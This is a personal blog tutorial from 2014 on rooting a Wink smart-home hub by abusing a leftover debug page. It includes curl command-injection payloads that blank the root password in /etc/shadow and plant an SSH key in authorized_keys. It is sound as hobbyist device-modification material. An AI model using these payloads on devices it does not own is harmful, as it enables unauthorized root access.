Sunday, November 30, 2014

How to root your WINK hub - Step by Step tutorial

Recently bought a WINK hub on a sale from Homedepot almost for free on the Blackfriday sale. I liked the concept since it supports multiple radios like Zigbee, Z-Wave, Lutron 433, Kidde 433, Bluetooth & Wifi. I already own a Vera 3 and i wanted to use this as a secondary controller by rooting the hub. Vera3 is extremely good and reliable except the UI but it only supports Z-Wave which made me think why can't i hack this free device as my secondary controller and use some of the cheap Zigbee devices available in Lowes like their Door Sensor, Panic Button, etc.

I searched and found very few sites that talks about rooting this hub but the steps were not clear.  So i thought of putting my own steps,

#1. Looks like the Wink team has left some of the development debugging pages on the production release, which we will be leveraging to take control on this hub.

#2. After purchasing the hub DO NOT CONNET to the internet which will make the hub download the latest firmware where they have fixed the issue.

#3. Plugin the hub ( Don't worry it won't connect to the Wink Servers yet). Wait for the flashing pink lights to come up.( green -> flashing pink).

#4. Now connect your laptop to the Wifi SSID name WINKHUB-*

#5. Trying hitting the following url from your browser and make sure sure it works.

http://192.168.0.1 

and you should see this "home page". Perform the below steps while you are still connected to the hub.

#6.  I am using Mac, so i opened a terminal and issued a curl command as given below to disable the root account's password.

curl "http://192.168.0.1/set_dev_value.php" -d "nodeId=a&attrId=;cp /etc/shadow /etc/shadow.bak;sed -i 's/root:.*:\(.*:.*:.*:.*:::\)/root::\1/' /etc/shadow;cat /etc/shadow;"

 This will take a minute so please be patient.

#7. Generate a ssh key now by typing the following commands on a terminal window,

$ssh-keygen -t rsa

press the enter key to accept the default location
Type a passphare when it prompts and confirm it by entering the passphare second time. Now the system generates the ssh key as shown below.

Your identification has been saved in /Users/username/.ssh/id_rsa.
Your public key has been saved in /Users/username/.ssh/id_rsa.pub.
The key fingerprint is:
bf:49:7f:cb:85:da:5a:f4:7c:1f:cc:23:dd:cc:55:f8 username@mac.local
The key's randomart image is:
+--[ RSA 2048]----+
|                 |
|         .       |
|        A .      |
|   .   . o       |
|  o . . G .      |
| + + o . +       |
|. o o = o +      |
| o...o + o       |
|.  oo.o .        |
+-----------------+

#8. Now copy all the contents of your id_rsa.pub file(/Users/username/.ssh/id_rsa.pub) and encode the content using any of the online encoder. I used http://meyerweb.com/eric/tools/dencoder/

#9. Copy the encoded content from the website and issue the following curl command from the terminal prompt as below(after replacing the your_encoded_key ) to add your ssh key to the hub.

curl "http://192.168.0.1/set_dev_value.php" -d "nodeId=a&attrId=;echo 'your_encoded_key' >> /root/.ssh/authorized_keys; cat /root/.ssh/authorized_keys;"

If the command is successful, it will list 2 rsa keys including the one that you just added.

#10.  Try to ssh into the hub using

root@192.168.0.1. 

#11. Now try editing the set_dev_value.php using,

$ vi /var/www/set_dev_value.php 

comment the line that starts with $cmd and add a new line as given below

$cmd = 'aprontest -u -m ' . $nodeId . ' -t ' . $attrId . ' -v ' . $v;

if you have done it correctly the file should look like this,

$nodeId = $_POST['nodeId'];
$attrId = $_POST['attrId'];
$v = $_POST['value'];

//$who = exec('whoami');
//echo $who;
//passthru("sudo ls", $retval);

//echo "nodeId=" .$nodeId . " attrId=" . $attrId . " value=" . $v;
//$cmd = 'sudo ' . dirname(__FILE__) . '/php2apron set_value ' . $nodeId . " " .
$cmd = 'aprontest -u -m ' . $nodeId . ' -t ' . $attrId . ' -v ' . $v;
//echo $cmd . " ";

passthru($cmd, $retval);
echo "ret_code=" . $retval;

?>

#12. We want to block the device from getting the new firmware by editing the host file located in /etc/hosts

and add the following entries in bold.

127.0.0.1       localhost
127.0.0.1       hub-api.winkapp.com
127.0.0.1       hub-updates.winkapp.com
127.0.0.1       wink-hub-images.s3.amazonaws.com
127.0.1.1       flex-dvt

#13. One more last step before we disconnect, edit the following file,

$vi /etc/init.d/S31platform 

and look for the following lines,

if [ ! -e /database/oauth ]; then                                   
    rm /database/wpa_supplicant.conf                            
fi

and edit the rm /database/wpa_supplicant.conf to rm /database/wpa_supplicant.conf1. I tried commenting the line but ran into issue. So i end up adding a 1 at the end, since the file anyway won't be there.

#13. Disconnect the ssh or open a new terminal and add your Wifi ssid/password using the following curl command by replacing the x's with your wifi's ssid and y's with your wifi's password.

curl "http://192.168.0.1/index.php" -d '{"ssid":"xxxxxxx","pass":"yyyyyyy"}'

#14. Now try rebooting the hub if everything goes well you should see a blue light which confirms that it works and try ssh into the hub and it should work like before.

Also try accessing the device page by visiting http://your-new-hub-ip/devices.php, which you will be using to add /remove devices.

this link was very useful when i was rooting my device.

If you brick your device you will see a flashing pink. Still you can access the hub through UART which is little hard and also you need some hardware. I will post the picture and pin configuration shortly. Here is my Part 2 where you will find information about getting the shell access to the wink hub through the UART using an FTDI board.